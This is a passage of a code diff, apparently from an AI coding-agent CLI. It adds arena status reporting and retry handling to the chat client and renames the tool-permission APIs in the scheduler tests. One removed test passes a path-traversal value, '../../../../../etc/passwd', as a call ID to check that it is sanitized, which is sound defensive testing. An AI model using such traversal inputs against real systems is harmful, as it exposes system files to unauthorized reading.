const model = this.config.getModel(); - const systemInstruction = getCoreSystemPrompt(userMemory, model); + const systemInstruction = this.getMainSessionSystemInstruction(); return new GeminiChat( this.config, @@ -207,6 +241,7 @@ export class GeminiClient { }, history, this.config.getChatRecordingService(), + uiTelemetryService, ); } catch (error) { await reportError( @@ -415,13 +450,19 @@ export class GeminiClient { request: PartListUnion, signal: AbortSignal, prompt_id: string, - options?: { isContinuation: boolean }, + options?: SendMessageOptions, turns: number = MAX_TURNS, ): AsyncGenerator { + const messageType = options?.type ?? SendMessageType.UserQuery; + + if (messageType === SendMessageType.Retry) { + this.stripOrphanedUserEntriesFromHistory(); + } + // Fire UserPromptSubmit hook through MessageBus (only if hooks are enabled) const hooksEnabled = this.config.getEnableHooks(); const messageBus = this.config.getMessageBus(); - if (hooksEnabled && messageBus) { + if (messageType !== SendMessageType.Retry && hooksEnabled && messageBus) { const promptText = partToString(request); const response = await messageBus.request< HookExecutionRequest, @@ -463,7 +504,7 @@ export class GeminiClient { } } - if (!options?.isContinuation) { + if (messageType === SendMessageType.UserQuery) { this.loopDetector.reset(prompt_id); this.lastPromptId = prompt_id; @@ -473,14 +514,18 @@ export class GeminiClient { // strip thoughts from history before sending the message this.stripThoughtsFromHistory(); } - this.sessionTurnCount++; - if ( - this.config.getMaxSessionTurns() > 0 && - this.sessionTurnCount > this.config.getMaxSessionTurns() - ) { - yield { type: GeminiEventType.MaxSessionTurns }; - return new Turn(this.getChat(), prompt_id); + if (messageType !== SendMessageType.Retry) { + this.sessionTurnCount++; + + if ( + this.config.getMaxSessionTurns() > 0 && + this.sessionTurnCount > this.config.getMaxSessionTurns() + ) { + yield { type: GeminiEventType.MaxSessionTurns }; + 
return new Turn(this.getChat(), prompt_id); + } } + // Ensure turns never exceeds MAX_TURNS to prevent infinite loops const boundedTurns = Math.min(turns, MAX_TURNS); if (!boundedTurns) { @@ -540,11 +585,24 @@ export class GeminiClient { this.forceFullIdeContext = false; } + // Check for arena control signal before starting a new turn + const arenaAgentClient = this.config.getArenaAgentClient(); + if (arenaAgentClient) { + const controlSignal = await arenaAgentClient.checkControlSignal(); + if (controlSignal) { + debugLogger.info( + `Arena control signal received: ${controlSignal.type} - ${controlSignal.reason}`, + ); + await arenaAgentClient.reportCancelled(); + return new Turn(this.getChat(), prompt_id); + } + } + const turn = new Turn(this.getChat(), prompt_id); // append system reminders to the request let requestToSent = await flatMapTextParts(request, async (text) => [text]); - if (!options?.isContinuation) { + if (messageType === SendMessageType.UserQuery) { const systemReminders = []; // add subagent system reminder if there are subagents @@ -564,6 +622,18 @@ export class GeminiClient { ); } + // add arena system reminder if an arena session is active + const arenaManager = this.config.getArenaManager(); + if (arenaManager) { + try { + const sessionDir = arenaManager.getArenaSessionDir(); + const configPath = `${sessionDir}/config.json`; + systemReminders.push(getArenaSystemReminder(configPath)); + } catch { + // Arena config not yet initialized — skip + } + } + requestToSent = [...systemReminders, ...requestToSent]; } @@ -576,11 +646,27 @@ export class GeminiClient { if (!this.config.getSkipLoopDetection()) { if (this.loopDetector.addAndCheck(event)) { yield { type: GeminiEventType.LoopDetected }; + if (arenaAgentClient) { + await arenaAgentClient.reportError('Loop detected'); + } return turn; } } + // Update arena status on Finished events — stats are derived + // automatically from uiTelemetryService by the reporter. 
+ if (arenaAgentClient && event.type === GeminiEventType.Finished) { + await arenaAgentClient.updateStatus(); + } + yield event; if (event.type === GeminiEventType.Error) { + if (arenaAgentClient) { + const errorMsg = + event.value instanceof Error + ? event.value.message + : 'Unknown error'; + await arenaAgentClient.reportError(errorMsg); + } return turn; } } @@ -637,7 +723,7 @@ export class GeminiClient { continueRequest, signal, prompt_id, - { isContinuation: true }, + { type: SendMessageType.Hook }, boundedTurns - 1, ); } @@ -645,6 +731,10 @@ export class GeminiClient { if (!turn.pendingToolCalls.length && signal && !signal.aborted) { if (this.config.getSkipNextSpeakerCheck()) { + // Report completed before returning — agent has no more work to do + if (arenaAgentClient) { + await arenaAgentClient.reportCompleted(); + } return turn; } @@ -673,9 +763,17 @@ export class GeminiClient { options, boundedTurns - 1, ); + } else if (arenaAgentClient) { + // No continuation needed — agent completed its task + await arenaAgentClient.reportCompleted(); } } + // Report cancelled to arena when user cancelled mid-stream + if (signal?.aborted && arenaAgentClient) { + await arenaAgentClient.reportCancelled(); + } + return turn; } @@ -694,7 +792,7 @@ export class GeminiClient { const userMemory = this.config.getUserMemory(); const finalSystemInstruction = generationConfig.systemInstruction ? 
getCustomSystemPrompt(generationConfig.systemInstruction, userMemory) - : getCoreSystemPrompt(userMemory, this.config.getModel()); + : this.getMainSessionSystemInstruction(); const requestConfig: GenerateContentConfig = { abortSignal, diff --git a/packages/core/src/core/coreToolScheduler.test.ts b/packages/core/src/core/coreToolScheduler.test.ts index 145e8ace1..65c614616 100644 --- a/packages/core/src/core/coreToolScheduler.test.ts +++ b/packages/core/src/core/coreToolScheduler.test.ts @@ -15,6 +15,7 @@ import type { ToolResultDisplay, ToolRegistry, } from '../index.js'; +import type { PermissionDecision } from '../permissions/types.js'; import { ApprovalMode, BaseDeclarativeTool, @@ -29,16 +30,18 @@ import type { ToolCall, WaitingToolCall } from './coreToolScheduler.js'; import { CoreToolScheduler, convertToFunctionResponse, - truncateAndSaveToFile, } from './coreToolScheduler.js'; import type { Part, PartListUnion } from '@google/genai'; import { MockModifiableTool, MockTool, - MOCK_TOOL_SHOULD_CONFIRM_EXECUTE, + MOCK_TOOL_GET_DEFAULT_PERMISSION, + MOCK_TOOL_GET_CONFIRMATION_DETAILS, } from '../test-utils/mock-tool.js'; -import * as fs from 'node:fs/promises'; -import * as path from 'node:path'; +import { MessageBusType } from '../confirmation-bus/types.js'; +import type { HookExecutionResponse } from '../confirmation-bus/types.js'; +import { type NotificationType } from '../hooks/types.js'; +import type { MessageBus } from '../confirmation-bus/message-bus.js'; vi.mock('fs/promises', () => ({ writeFile: vi.fn(), @@ -83,14 +86,14 @@ class TestApprovalInvocation extends BaseToolInvocation< return `Test tool ${this.params.id}`; } - override async shouldConfirmExecute(): Promise< - ToolCallConfirmationDetails | false - > { - // Need confirmation unless approval mode is AUTO_EDIT + override async getDefaultPermission(): Promise { if (this.config.getApprovalMode() === ApprovalMode.AUTO_EDIT) { - return false; + return 'allow'; } + return 'ask'; + } + override async 
getConfirmationDetails(): Promise { return { type: 'edit', title: `Confirm Test Tool ${this.params.id}`, @@ -127,9 +130,13 @@ class AbortDuringConfirmationInvocation extends BaseToolInvocation< super(params); } - override async shouldConfirmExecute( + override async getDefaultPermission(): Promise { + return 'ask'; + } + + override async getConfirmationDetails( _signal: AbortSignal, - ): Promise { + ): Promise { this.abortController.abort(); throw this.abortError; } @@ -213,7 +220,8 @@ describe('CoreToolScheduler', () => { it('should cancel a tool call if the signal is aborted before confirmation', async () => { const mockTool = new MockTool({ name: 'mockTool', - shouldConfirmExecute: MOCK_TOOL_SHOULD_CONFIRM_EXECUTE, + getDefaultPermission: MOCK_TOOL_GET_DEFAULT_PERMISSION, + getConfirmationDetails: MOCK_TOOL_GET_CONFIRMATION_DETAILS, }); const declarativeTool = mockTool; const mockToolRegistry = { @@ -238,7 +246,7 @@ describe('CoreToolScheduler', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => ApprovalMode.DEFAULT, - getAllowedTools: () => [], + getPermissionsAllow: () => [], getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -257,6 +265,8 @@ describe('CoreToolScheduler', () => { getUseModelRouter: () => false, getGeminiClient: () => null, // No client needed for these tests getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const scheduler = new CoreToolScheduler({ @@ -315,7 +325,7 @@ describe('CoreToolScheduler', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => ApprovalMode.DEFAULT, - getAllowedTools: () => [], + getPermissionsAllow: () => [], getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -334,6 +344,8 @@ describe('CoreToolScheduler', () => { getUseModelRouter: () => false, 
getGeminiClient: () => null, getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const scheduler = new CoreToolScheduler({ @@ -375,8 +387,10 @@ describe('CoreToolScheduler', () => { getToolRegistry: () => mockToolRegistry, getUseModelRouter: () => false, getGeminiClient: () => null, // No client needed for these tests - getExcludeTools: () => undefined, + getPermissionsDeny: () => undefined, isInteractive: () => true, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; // Create scheduler @@ -416,8 +430,10 @@ describe('CoreToolScheduler', () => { getToolRegistry: () => mockToolRegistry, getUseModelRouter: () => false, getGeminiClient: () => null, - getExcludeTools: () => ['write_file', 'edit', 'run_shell_command'], + getPermissionsDeny: () => ['write_file', 'edit', 'run_shell_command'], isInteractive: () => false, // Value doesn't matter, but included for completeness + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; // Create scheduler @@ -446,8 +462,10 @@ describe('CoreToolScheduler', () => { getToolRegistry: () => mockToolRegistry, getUseModelRouter: () => false, getGeminiClient: () => null, - getExcludeTools: () => ['write_file', 'edit'], + getPermissionsDeny: () => ['write_file', 'edit'], isInteractive: () => false, // Value doesn't matter + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; // Create scheduler @@ -487,8 +505,10 @@ describe('CoreToolScheduler', () => { getToolRegistry: () => mockToolRegistry, getUseModelRouter: () => false, getGeminiClient: () => null, - getExcludeTools: () => undefined, + getPermissionsDeny: () => undefined, isInteractive: () => true, + getMessageBus: vi.fn().mockReturnValue(undefined), + 
getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; // Create scheduler @@ -547,8 +567,8 @@ describe('CoreToolScheduler', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => ApprovalMode.DEFAULT, - getAllowedTools: () => [], - getExcludeTools: () => ['write_file', 'edit', 'run_shell_command'], + getPermissionsAllow: () => [], + getPermissionsDeny: () => ['write_file', 'edit', 'run_shell_command'], getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -567,6 +587,8 @@ describe('CoreToolScheduler', () => { getUseModelRouter: () => false, getGeminiClient: () => null, getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const scheduler = new CoreToolScheduler({ @@ -633,8 +655,8 @@ describe('CoreToolScheduler', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => ApprovalMode.DEFAULT, - getAllowedTools: () => [], - getExcludeTools: () => ['write_file', 'edit'], // Different excluded tools + getPermissionsAllow: () => [], + getPermissionsDeny: () => ['write_file', 'edit'], // Different excluded tools getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -653,6 +675,8 @@ describe('CoreToolScheduler', () => { getUseModelRouter: () => false, getGeminiClient: () => null, getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const scheduler = new CoreToolScheduler({ @@ -723,7 +747,7 @@ describe('CoreToolScheduler with payload', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => ApprovalMode.DEFAULT, - getAllowedTools: () => [], + getPermissionsAllow: () => [], getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -745,6 
+769,8 @@ describe('CoreToolScheduler with payload', () => { getIdeMode: () => false, getExperimentalZedIntegration: () => false, getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const scheduler = new CoreToolScheduler({ @@ -998,9 +1024,13 @@ class MockEditToolInvocation extends BaseToolInvocation< return 'A mock edit tool invocation'; } - override async shouldConfirmExecute( + override async getDefaultPermission(): Promise { + return 'ask'; + } + + override async getConfirmationDetails( _abortSignal: AbortSignal, - ): Promise { + ): Promise { return { type: 'edit', title: 'Confirm Edit', @@ -1062,7 +1092,7 @@ describe('CoreToolScheduler edit cancellation', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => ApprovalMode.DEFAULT, - getAllowedTools: () => [], + getPermissionsAllow: () => [], getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -1081,6 +1111,8 @@ describe('CoreToolScheduler edit cancellation', () => { getIdeMode: () => false, getExperimentalZedIntegration: () => false, getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const scheduler = new CoreToolScheduler({ @@ -1140,7 +1172,8 @@ describe('CoreToolScheduler YOLO mode', () => { const mockTool = new MockTool({ name: 'mockTool', execute: executeFn, - shouldConfirmExecute: MOCK_TOOL_SHOULD_CONFIRM_EXECUTE, + getDefaultPermission: MOCK_TOOL_GET_DEFAULT_PERMISSION, + getConfirmationDetails: MOCK_TOOL_GET_CONFIRMATION_DETAILS, }); const declarativeTool = mockTool; @@ -1168,7 +1201,7 @@ describe('CoreToolScheduler YOLO mode', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => ApprovalMode.YOLO, - getAllowedTools: () => [], + getPermissionsAllow: () => [], 
getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -1187,6 +1220,8 @@ describe('CoreToolScheduler YOLO mode', () => { getUseModelRouter: () => false, getGeminiClient: () => null, // No client needed for these tests getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const scheduler = new CoreToolScheduler({ @@ -1328,6 +1363,8 @@ describe('CoreToolScheduler cancellation during executing with live output', () terminalHeight: 30, }), getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const scheduler = new CoreToolScheduler({ @@ -1409,7 +1446,7 @@ describe('CoreToolScheduler request queueing', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => ApprovalMode.YOLO, // Use YOLO to avoid confirmation prompts - getAllowedTools: () => [], + getPermissionsAllow: () => [], getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -1428,6 +1465,8 @@ describe('CoreToolScheduler request queueing', () => { getUseModelRouter: () => false, getGeminiClient: () => null, // No client needed for these tests getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const scheduler = new CoreToolScheduler({ @@ -1503,118 +1542,6 @@ describe('CoreToolScheduler request queueing', () => { expect(onAllToolCallsComplete.mock.calls[1][0][0].status).toBe('success'); }); - it('should auto-approve a tool call if it is on the allowedTools list', async () => { - // Arrange - const executeFn = vi.fn().mockResolvedValue({ - llmContent: 'Tool executed', - returnDisplay: 'Tool executed', - }); - const mockTool = new MockTool({ - name: 'mockTool', - execute: executeFn, - 
shouldConfirmExecute: MOCK_TOOL_SHOULD_CONFIRM_EXECUTE, - }); - const declarativeTool = mockTool; - - const toolRegistry = { - getTool: () => declarativeTool, - getToolByName: () => declarativeTool, - getFunctionDeclarations: () => [], - tools: new Map(), - discovery: {}, - registerTool: () => {}, - getToolByDisplayName: () => declarativeTool, - getTools: () => [], - discoverTools: async () => {}, - getAllTools: () => [], - getToolsByServer: () => [], - } as unknown as ToolRegistry; - - const onAllToolCallsComplete = vi.fn(); - const onToolCallsUpdate = vi.fn(); - - // Configure the scheduler to auto-approve the specific tool call. - const mockConfig = { - getSessionId: () => 'test-session-id', - getUsageStatisticsEnabled: () => true, - getDebugMode: () => false, - getApprovalMode: () => ApprovalMode.DEFAULT, // Not YOLO mode - getAllowedTools: () => ['mockTool'], // Auto-approve this tool - getToolRegistry: () => toolRegistry, - getContentGeneratorConfig: () => ({ - model: 'test-model', - authType: 'gemini', - }), - getShellExecutionConfig: () => ({ - terminalWidth: 80, - terminalHeight: 24, - }), - getTerminalWidth: vi.fn(() => 80), - getTerminalHeight: vi.fn(() => 24), - storage: { - getProjectTempDir: () => '/tmp', - }, - getTruncateToolOutputThreshold: () => - DEFAULT_TRUNCATE_TOOL_OUTPUT_THRESHOLD, - getTruncateToolOutputLines: () => DEFAULT_TRUNCATE_TOOL_OUTPUT_LINES, - getUseModelRouter: () => false, - getGeminiClient: () => null, // No client needed for these tests - getChatRecordingService: () => undefined, - } as unknown as Config; - - const scheduler = new CoreToolScheduler({ - config: mockConfig, - onAllToolCallsComplete, - onToolCallsUpdate, - getPreferredEditor: () => 'vscode', - onEditorClose: vi.fn(), - }); - - const abortController = new AbortController(); - const request = { - callId: '1', - name: 'mockTool', - args: { param: 'value' }, - isClientInitiated: false, - prompt_id: 'prompt-auto-approved', - }; - - // Act - await 
scheduler.schedule([request], abortController.signal); - - // Wait for the tool execution to complete - await vi.waitFor(() => { - expect(onAllToolCallsComplete).toHaveBeenCalled(); - }); - - // Assert - // 1. The tool's execute method was called directly. - expect(executeFn).toHaveBeenCalledWith({ param: 'value' }); - - // 2. The tool call status never entered 'awaiting_approval'. - const statusUpdates = onToolCallsUpdate.mock.calls - .map((call) => (call[0][0] as ToolCall)?.status) - .filter(Boolean); - expect(statusUpdates).not.toContain('awaiting_approval'); - expect(statusUpdates).toEqual([ - 'validating', - 'scheduled', - 'executing', - 'success', - ]); - - // 3. The final callback indicates the tool call was successful. - expect(onAllToolCallsComplete).toHaveBeenCalled(); - const completedCalls = onAllToolCallsComplete.mock - .calls[0][0] as ToolCall[]; - expect(completedCalls).toHaveLength(1); - const completedCall = completedCalls[0]; - expect(completedCall.status).toBe('success'); - if (completedCall.status === 'success') { - expect(completedCall.response.resultDisplay).toBe('Tool executed'); - } - }); - it('should handle two synchronous calls to schedule', async () => { const executeFn = vi.fn().mockResolvedValue({ llmContent: 'Tool executed', @@ -1643,7 +1570,7 @@ describe('CoreToolScheduler request queueing', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => ApprovalMode.YOLO, - getAllowedTools: () => [], + getPermissionsAllow: () => [], getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -1662,6 +1589,8 @@ describe('CoreToolScheduler request queueing', () => { getUseModelRouter: () => false, getGeminiClient: () => null, // No client needed for these tests getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const scheduler = new CoreToolScheduler({ @@ -1717,7 
+1646,7 @@ describe('CoreToolScheduler request queueing', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => approvalMode, - getAllowedTools: () => [], + getPermissionsAllow: () => [], setApprovalMode: (mode: ApprovalMode) => { approvalMode = mode; }, @@ -1737,6 +1666,8 @@ describe('CoreToolScheduler request queueing', () => { getIdeMode: () => false, getExperimentalZedIntegration: () => false, getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const testTool = new TestApprovalTool(mockConfig); @@ -1879,8 +1810,8 @@ describe('CoreToolScheduler truncated output protection', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => ApprovalMode.AUTO_EDIT, - getAllowedTools: () => [], - getExcludeTools: () => undefined, + getPermissionsAllow: () => [], + getPermissionsDeny: () => undefined, getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -1900,6 +1831,8 @@ describe('CoreToolScheduler truncated output protection', () => { getGeminiClient: () => null, getChatRecordingService: () => undefined, isInteractive: () => true, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const scheduler = new CoreToolScheduler({ @@ -2078,7 +2011,7 @@ describe('CoreToolScheduler Sequential Execution', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => ApprovalMode.YOLO, // Use YOLO to avoid confirmation prompts - getAllowedTools: () => [], + getPermissionsAllow: () => [], getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -2097,6 +2030,8 @@ describe('CoreToolScheduler Sequential Execution', () => { getUseModelRouter: () => false, getGeminiClient: () => null, getChatRecordingService: () => undefined, + 
getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const scheduler = new CoreToolScheduler({ @@ -2198,7 +2133,7 @@ describe('CoreToolScheduler Sequential Execution', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => ApprovalMode.YOLO, - getAllowedTools: () => [], + getPermissionsAllow: () => [], getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -2217,6 +2152,8 @@ describe('CoreToolScheduler Sequential Execution', () => { getUseModelRouter: () => false, getGeminiClient: () => null, getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; const scheduler = new CoreToolScheduler({ @@ -2290,227 +2227,6 @@ describe('CoreToolScheduler Sequential Execution', () => { }); }); -describe('truncateAndSaveToFile', () => { - const mockWriteFile = vi.mocked(fs.writeFile); - const THRESHOLD = 40_000; - const TRUNCATE_LINES = 1000; - - beforeEach(() => { - vi.clearAllMocks(); - }); - - it('should return content unchanged if below threshold', async () => { - const content = 'Short content'; - const callId = 'test-call-id'; - const projectTempDir = '/tmp'; - - const result = await truncateAndSaveToFile( - content, - callId, - projectTempDir, - THRESHOLD, - TRUNCATE_LINES, - ); - - expect(result).toEqual({ content }); - expect(mockWriteFile).not.toHaveBeenCalled(); - }); - - it('should truncate content by lines when content has many lines', async () => { - // Create content that exceeds 100,000 character threshold with many lines - const lines = Array(2000).fill('x'.repeat(100)); // 100 chars per line * 2000 lines = 200,000 chars - const content = lines.join('\n'); - const callId = 'test-call-id'; - const projectTempDir = '/tmp'; - - mockWriteFile.mockResolvedValue(undefined); - - const result = await truncateAndSaveToFile( - 
content, - callId, - projectTempDir, - THRESHOLD, - TRUNCATE_LINES, - ); - - expect(result.outputFile).toBe( - path.join(projectTempDir, `${callId}.output`), - ); - expect(mockWriteFile).toHaveBeenCalledWith( - path.join(projectTempDir, `${callId}.output`), - content, - ); - - // Should contain the first and last lines with 1/5 head and 4/5 tail - const head = Math.floor(TRUNCATE_LINES / 5); - const beginning = lines.slice(0, head); - const end = lines.slice(-(TRUNCATE_LINES - head)); - const expectedTruncated = - beginning.join('\n') + '\n... [CONTENT TRUNCATED] ...\n' + end.join('\n'); - - expect(result.content).toContain( - 'Tool output was too large and has been truncated', - ); - expect(result.content).toContain('Truncated part of the output:'); - expect(result.content).toContain(expectedTruncated); - }); - - it('should wrap and truncate content when content has few but long lines', async () => { - const content = 'a'.repeat(200_000); // A single very long line - const callId = 'test-call-id'; - const projectTempDir = '/tmp'; - const wrapWidth = 120; - - mockWriteFile.mockResolvedValue(undefined); - - // Manually wrap the content to generate the expected file content - const wrappedLines: string[] = []; - for (let i = 0; i < content.length; i += wrapWidth) { - wrappedLines.push(content.substring(i, i + wrapWidth)); - } - const expectedFileContent = wrappedLines.join('\n'); - - const result = await truncateAndSaveToFile( - content, - callId, - projectTempDir, - THRESHOLD, - TRUNCATE_LINES, - ); - - expect(result.outputFile).toBe( - path.join(projectTempDir, `${callId}.output`), - ); - // Check that the file was written with the wrapped content - expect(mockWriteFile).toHaveBeenCalledWith( - path.join(projectTempDir, `${callId}.output`), - expectedFileContent, - ); - - // Should contain the first and last lines with 1/5 head and 4/5 tail of the wrapped content - const head = Math.floor(TRUNCATE_LINES / 5); - const beginning = wrappedLines.slice(0, head); - const 
end = wrappedLines.slice(-(TRUNCATE_LINES - head)); - const expectedTruncated = - beginning.join('\n') + '\n... [CONTENT TRUNCATED] ...\n' + end.join('\n'); - expect(result.content).toContain( - 'Tool output was too large and has been truncated', - ); - expect(result.content).toContain('Truncated part of the output:'); - expect(result.content).toContain(expectedTruncated); - }); - - it('should handle file write errors gracefully', async () => { - const content = 'a'.repeat(2_000_000); - const callId = 'test-call-id'; - const projectTempDir = '/tmp'; - - mockWriteFile.mockRejectedValue(new Error('File write failed')); - - const result = await truncateAndSaveToFile( - content, - callId, - projectTempDir, - THRESHOLD, - TRUNCATE_LINES, - ); - - expect(result.outputFile).toBeUndefined(); - expect(result.content).toContain( - '[Note: Could not save full output to file]', - ); - expect(mockWriteFile).toHaveBeenCalled(); - }); - - it('should save to correct file path with call ID', async () => { - const content = 'a'.repeat(200_000); - const callId = 'unique-call-123'; - const projectTempDir = '/custom/temp/dir'; - const wrapWidth = 120; - - mockWriteFile.mockResolvedValue(undefined); - - // Manually wrap the content to generate the expected file content - const wrappedLines: string[] = []; - for (let i = 0; i < content.length; i += wrapWidth) { - wrappedLines.push(content.substring(i, i + wrapWidth)); - } - const expectedFileContent = wrappedLines.join('\n'); - - const result = await truncateAndSaveToFile( - content, - callId, - projectTempDir, - THRESHOLD, - TRUNCATE_LINES, - ); - - const expectedPath = path.join(projectTempDir, `${callId}.output`); - expect(result.outputFile).toBe(expectedPath); - expect(mockWriteFile).toHaveBeenCalledWith( - expectedPath, - expectedFileContent, - ); - }); - - it('should include helpful instructions in truncated message', async () => { - const content = 'a'.repeat(2_000_000); - const callId = 'test-call-id'; - const projectTempDir = 
'/tmp'; - - mockWriteFile.mockResolvedValue(undefined); - - const result = await truncateAndSaveToFile( - content, - callId, - projectTempDir, - THRESHOLD, - TRUNCATE_LINES, - ); - - expect(result.content).toContain( - 'Tool output was too large and has been truncated', - ); - expect(result.content).toContain('The full output has been saved to:'); - expect(result.content).toContain( - 'To read the complete output, use the read_file tool with the absolute file path above', - ); - expect(result.content).toContain( - 'The truncated output below shows the beginning and end of the content', - ); - }); - - it('should sanitize callId to prevent path traversal', async () => { - const content = 'a'.repeat(200_000); - const callId = '../../../../../etc/passwd'; - const projectTempDir = '/tmp/safe_dir'; - const wrapWidth = 120; - - mockWriteFile.mockResolvedValue(undefined); - - // Manually wrap the content to generate the expected file content - const wrappedLines: string[] = []; - for (let i = 0; i < content.length; i += wrapWidth) { - wrappedLines.push(content.substring(i, i + wrapWidth)); - } - const expectedFileContent = wrappedLines.join('\n'); - - await truncateAndSaveToFile( - content, - callId, - projectTempDir, - THRESHOLD, - TRUNCATE_LINES, - ); - - const expectedPath = path.join(projectTempDir, 'passwd.output'); - expect(mockWriteFile).toHaveBeenCalledWith( - expectedPath, - expectedFileContent, - ); - }); -}); - describe('CoreToolScheduler plan mode with ask_user_question', () => { function createAskUserQuestionMockTool() { let wasAnswered = false; @@ -2518,7 +2234,8 @@ describe('CoreToolScheduler plan mode with ask_user_question', () => { return new MockTool({ name: 'ask_user_question', - shouldConfirmExecute: async () => ({ + getDefaultPermission: async () => 'ask', + getConfirmationDetails: async () => ({ type: 'ask_user_question' as const, title: 'Please answer the following question(s):', questions: [ @@ -2589,7 +2306,7 @@ describe('CoreToolScheduler plan 
mode with ask_user_question', () => { getUsageStatisticsEnabled: () => true, getDebugMode: () => false, getApprovalMode: () => ApprovalMode.PLAN, - getAllowedTools: () => [], + getPermissionsAllow: () => [], getContentGeneratorConfig: () => ({ model: 'test-model', authType: 'gemini', @@ -2611,6 +2328,8 @@ describe('CoreToolScheduler plan mode with ask_user_question', () => { getIdeMode: () => false, getExperimentalZedIntegration: () => false, getChatRecordingService: () => undefined, + getMessageBus: vi.fn().mockReturnValue(undefined), + getEnableHooks: vi.fn().mockReturnValue(false), } as unknown as Config; return new CoreToolScheduler({ @@ -2725,7 +2444,8 @@ describe('CoreToolScheduler plan mode with ask_user_question', () => { it('should block non-ask_user_question tools that need confirmation in plan mode', async () => { const editTool = new MockTool({ name: 'write_file', - shouldConfirmExecute: MOCK_TOOL_SHOULD_CONFIRM_EXECUTE, + getDefaultPermission: MOCK_TOOL_GET_DEFAULT_PERMISSION, + getConfirmationDetails: MOCK_TOOL_GET_CONFIRMATION_DETAILS, }); const onAllToolCallsComplete = vi.fn(); const onToolCallsUpdate = vi.fn(); @@ -2812,3 +2532,626 @@ describe('CoreToolScheduler plan mode with ask_user_question', () => { expect(completedCalls[0].status).toBe('cancelled'); }); }); + +// Integration tests for the fire* functions +describe('Fire hook functions integration', () => { + let mockMessageBus: { request: ReturnType }; + + beforeEach(() => { + mockMessageBus = { + request: vi.fn(), + }; + }); + + describe('firePreToolUseHook', () => { + it('should allow tool execution when hook permits', async () => { + const { firePreToolUseHook } = await import('./toolHookTriggers.js'); + + const mockResponse: HookExecutionResponse = { + type: MessageBusType.HOOK_EXECUTION_RESPONSE, + correlationId: 'test-correlation-id', + success: true, + output: { + decision: 'allow', + }, + }; + + mockMessageBus.request.mockResolvedValue(mockResponse); + + const result = await 
